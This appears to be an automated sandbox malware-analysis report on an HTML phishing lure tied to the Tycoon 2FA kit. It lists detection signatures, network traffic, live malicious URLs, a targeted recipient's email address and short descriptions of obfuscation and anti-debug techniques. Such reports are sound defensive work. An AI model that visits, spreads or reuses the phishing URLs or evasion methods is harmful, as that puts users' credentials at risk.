Edit tour

Windows Analysis Report
Play_Audio.#Anina.html

Overview

General Information

Sample name:	Play_Audio.#Anina.html
Analysis ID:	1647521
MD5:	36a82ff8d3a0813c702aba61bfb611c7
SHA1:	c568c7f58e3b73aa0345c5af30894a6637514a56
SHA256:	b5548a8526867594c42c7a317c3e7a24d725792ca1ea55620bef031a7a9d31cd
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Yara detected AntiDebug via timestamp check

Yara detected HtmlPhish44

Yara detected Invisible JS

Yara detected Obfuscation Via HangulCharacter

Yara detected Tycoon 2FA PaaS

AI detected suspicious Javascript

Detected javascript redirector / loader

HTML IFrame injector detected

HTML Script injector detected

HTML document with suspicious name

HTML document with suspicious title

Creates files inside the system directory

Deletes files inside the Windows folder

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 1236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2368,i,5159798735174647270,7677478092604775120,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2396 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Play_Audio.#Anina.html" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_57	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

HTML

Source	Rule	Description	Author
0.7.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
0.4.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
0.4.d.script.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
0.2.d.script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.2.d.script.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
0.8..script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.2.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.1.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.2.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
0.1.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
Click to see the 5 entries

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

• Phishing
• Compliance
• Networking
• System Summary
• Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: dropped/chromecache_57, type: DROPPED

Yara detected Invisible JS

Source: Yara match	File source: 0.2.d.script.csv, type: HTML
Source: Yara match	File source: 0.2.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML

Yara detected Obfuscation Via HangulCharacter

Source: Yara match	File source: 0.2.d.script.csv, type: HTML
Source: Yara match	File source: 0.8..script.csv, type: HTML
Source: Yara match	File source: 0.2.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML

Yara detected Tycoon 2FA PaaS

Source: Yara match	File source: 0.7.d.script.csv, type: HTML
Source: Yara match	File source: 0.4.d.script.csv, type: HTML

AI detected suspicious Javascript

Source: 0.3..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://kxxc.vsvtcmys.ru/rnEyEPoLGAle/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob` and `decodeURIComponent` to decode and execute remote content is a clear indicator of malicious intent. Additionally, the script appears to be interacting with an untrusted domain, further increasing the risk. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
Source: 0.8..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://kxxc.vsvtcmys.ru/rnEyEPoLGAle/... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.

Detected javascript redirector / loader

Source: Play_Audio.#Anina.html

HTTP Parser: Low number of body elements: 1

HTML IFrame injector detected

Source: file:///C:/Users/user/Desktop/Play_Audio.%23Anina.html#Manina@arts.state.tx.us

HTTP Parser: New IFrame, src: https://kxXC.vsvtcmys.ru/rnEyEPoLGAle/#Manina@arts.state.tx.us

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/Play_Audio.%23Anina.html#Manina@arts.state.tx.us	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/Play_Audio.%23Anina.html#Manina@arts.state.tx.us	HTTP Parser: New script tag found

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/Play_Audio.%23Anina.html#Manina@arts.state.tx.us

Tab title: Play_Audio.%23Anina.html

Source: Play_Audio.#Anina.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_Audio.%23Anina.html#Manina@arts.state.tx.us	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.4:49729 version: TLS 1.2

Source: Joe Sandbox View	IP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 151.101.2.137 151.101.2.137
Source: Joe Sandbox View	IP Address: 151.101.2.137 151.101.2.137

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.32.99
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.32.99
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /rnEyEPoLGAle/ HTTP/1.1Host: kxxc.vsvtcmys.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://kxxc.vsvtcmys.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://kxxc.vsvtcmys.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: kxxc.vsvtcmys.ru
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.4:49729 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: Play_Audio.#Anina.html

Initial sample: play

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir3432_338469412

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir3432_338469412

Jump to behavior

Source: classification engine

Classification label: mal100.phis.evad.winHTML@23/6@8/6

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2368,i,5159798735174647270,7677478092604775120,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2396 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Play_Audio.#Anina.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2368,i,5159798735174647270,7677478092604775120,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2396 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Malware Analysis System Evasion

Yara detected AntiDebug via timestamp check

Source: Yara match

File source: 0.4.d.script.csv, type: HTML

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
file:///C:/Users/user/Desktop/Play_Audio.%23Anina.html#Manina@arts.state.tx.us	0%	Avira URL Cloud	safe
https://kxxc.vsvtcmys.ru/rnEyEPoLGAle/	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
code.jquery.com	151.101.2.137	true	false	high
cdnjs.cloudflare.com	104.17.24.14	true	false	high
www.google.com	142.251.40.132	true	false	high
kxxc.vsvtcmys.ru	104.21.16.1	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://code.jquery.com/jquery-3.6.0.min.js	false		high
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js	false		high
file:///C:/Users/user/Desktop/Play_Audio.%23Anina.html#Manina@arts.state.tx.us	true	Avira URL Cloud: safe	unknown
https://kxxc.vsvtcmys.ru/rnEyEPoLGAle/	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
104.21.16.1	kxxc.vsvtcmys.ru	United States	13335	CLOUDFLARENETUS	true
151.101.2.137	code.jquery.com	United States	54113	FASTLYUS	false
142.251.40.132	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16
192.168.2.4

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1647521
Start date and time:	2025-03-24 23:01:40 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Play_Audio.#Anina.html
Detection:	MAL
Classification:	mal100.phis.evad.winHTML@23/6@8/6
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.41.14, 142.250.80.3, 142.250.176.206, 142.251.163.84, 142.250.80.35, 142.251.40.206, 142.250.65.238, 142.251.40.238, 142.250.80.46, 142.251.32.110, 142.250.80.110, 142.250.72.99, 142.250.176.195, 142.251.40.110, 142.251.40.142, 204.79.197.222, 172.202.163.200
Excluded domains from analysis (whitelisted): clients1.google.com, fp.msedge.net, clients2.google.com, edgedl.me.gvt1.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.101.2.137	http://facebooksecurity.blogspot.co.uk/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://facebooksecurity.blogspot.ro/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://novo.oratoriomariano.com/novo/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	http://facebooksecurity.blogspot.dk/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://soporte-store.info/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://applela.za.com/isignesp.php?id=	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.9.1.js
	http://awqffg.newburuan2023.biz.id/next.php	Get hash	malicious	HTMLPhisher	Browse	code.jquery.com/jquery-1.10.2.min.js
104.17.24.14	Proforma.Invoice.Payment.$$.html	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
	http://vtaurl.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
	http://Voyages.CNTraveler.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
104.21.16.1	2023-20-03-5910184618-5910184618-fs#U00b7pdf.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.dramavietsub.net/rcu7/
	http://104.21.16.1	Get hash	malicious	Unknown	Browse	104.21.16.1/favicon.ico
	https://t.co/6BJID9q49h	Get hash	malicious	HTMLPhisher	Browse	tcerfw.wittnng.sbs/favicon.ico
	J8bamK92a3.exe	Get hash	malicious	FormBook	Browse	www.play-vanguard-nirvana.xyz/egs9/?9r=2m/uVQwqKH2EIWlawszTKzvIepBfVH/HI19qzylF05nDLsWuBLn1pb4DiFDKEzYOkwPMwL8bVA==&vZR=H2MpG0p
	0t7MXNEfCg.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	g1V10ssekg.exe	Get hash	malicious	FormBook	Browse	www.sigaque.today/n61y/?UPV=BOlfS7N9ZWkGRIMRgNC6B6+WUTyM673eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBBYPYz0JSQDMkWzhvpNbFnW2/OcjAWw==&YrV=FlsDgRMx
	0IrTeguWM7.exe	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/ftbq/
	Shipping Document.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/6m32/
	Payment Record.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	Invoice Remittance ref27022558.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
code.jquery.com	00583_QB_Payment_Statemnt53T.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
	#U25b6#Ufe0fPLAY-VOICMAIL(2).svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.66.137
	RECIPIENT_DOMAIN_NAME.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
	#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	Acgsys#receipt0191.html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.194.137
	0064_QB_Payment_Statemnt87T.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
	https://8tf7eelab.cc.rs6.net	Get hash	malicious	Unknown	Browse	151.101.130.137
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://www.bing.com/ck/a?!&&p=e81ff1b9f175bc97b5aba94538245134c97a0f2e284b6d1b7f4817cef43c829bJmltdHM9MTc0Mjc3NDQwMA&ptn=3&ver=2&hsh=4&fclid=19c568d0-da5e-6cab-0452-7d78db436d5e&u=a1aHR0cHM6Ly93d3cuZm90b3BvcmNlbGFuYS5jb20uYnIvbW9kZWxvcy1lc3BlY2lhaXMv&ntb=1	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
cdnjs.cloudflare.com	https://geminiduplication.com/public/records	Get hash	malicious	Unknown	Browse	104.17.24.14
	00583_QB_Payment_Statemnt53T.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.17.24.14
	#U25b6#Ufe0fPLAY-VOICMAIL(2).svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	104.17.24.14
	RECIPIENT_DOMAIN_NAME.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.17.25.14
	Acgsys#receipt0191.html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.17.24.14
	0064_QB_Payment_Statemnt87T.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.17.25.14
	https://tfsgroups.com/contact-2/	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://8tf7eelab.cc.rs6.net	Get hash	malicious	Unknown	Browse	104.17.25.14
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://geminiduplication.com/public/records	Get hash	malicious	Unknown	Browse	104.19.218.18
	00583_QB_Payment_Statemnt53T.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.0.100
	https://www.about-fraud.com/providers/vesta/	Get hash	malicious	Anonymous Proxy	Browse	104.21.77.100
	#U25b6#Ufe0fPLAY-VOICMAIL(2).svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	104.21.91.231
	http://hdm.bdienzelsex.com	Get hash	malicious	Unknown	Browse	104.21.64.1
	https://www.about-fraud.com/2025solution-providers-infographic/	Get hash	malicious	Unknown	Browse	104.18.33.206
	VerifiedAssetLeaks.exe	Get hash	malicious	Python Stealer, Blank Grabber, XWorm	Browse	162.159.137.232
	http://gamma.app	Get hash	malicious	Unknown	Browse	104.18.86.42
	http://gamma.app/docs/Harbour-House-Bal-Harbour-Condominium-mb6lc4ua8rxfb00?mode=present	Get hash	malicious	Unknown	Browse	104.18.11.200
	https://access-rhsagroup-manucapiatol.wtranovations.com/edzxesfee/d205afd3/?cf8ap=fu@rng.com	Get hash	malicious	Unknown	Browse	172.67.186.77
CLOUDFLARENETUS	https://geminiduplication.com/public/records	Get hash	malicious	Unknown	Browse	104.19.218.18
	00583_QB_Payment_Statemnt53T.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.0.100
	https://www.about-fraud.com/providers/vesta/	Get hash	malicious	Anonymous Proxy	Browse	104.21.77.100
	#U25b6#Ufe0fPLAY-VOICMAIL(2).svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	104.21.91.231
	http://hdm.bdienzelsex.com	Get hash	malicious	Unknown	Browse	104.21.64.1
	https://www.about-fraud.com/2025solution-providers-infographic/	Get hash	malicious	Unknown	Browse	104.18.33.206
	VerifiedAssetLeaks.exe	Get hash	malicious	Python Stealer, Blank Grabber, XWorm	Browse	162.159.137.232
	http://gamma.app	Get hash	malicious	Unknown	Browse	104.18.86.42
	http://gamma.app/docs/Harbour-House-Bal-Harbour-Condominium-mb6lc4ua8rxfb00?mode=present	Get hash	malicious	Unknown	Browse	104.18.11.200
	https://access-rhsagroup-manucapiatol.wtranovations.com/edzxesfee/d205afd3/?cf8ap=fu@rng.com	Get hash	malicious	Unknown	Browse	172.67.186.77
FASTLYUS	00583_QB_Payment_Statemnt53T.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
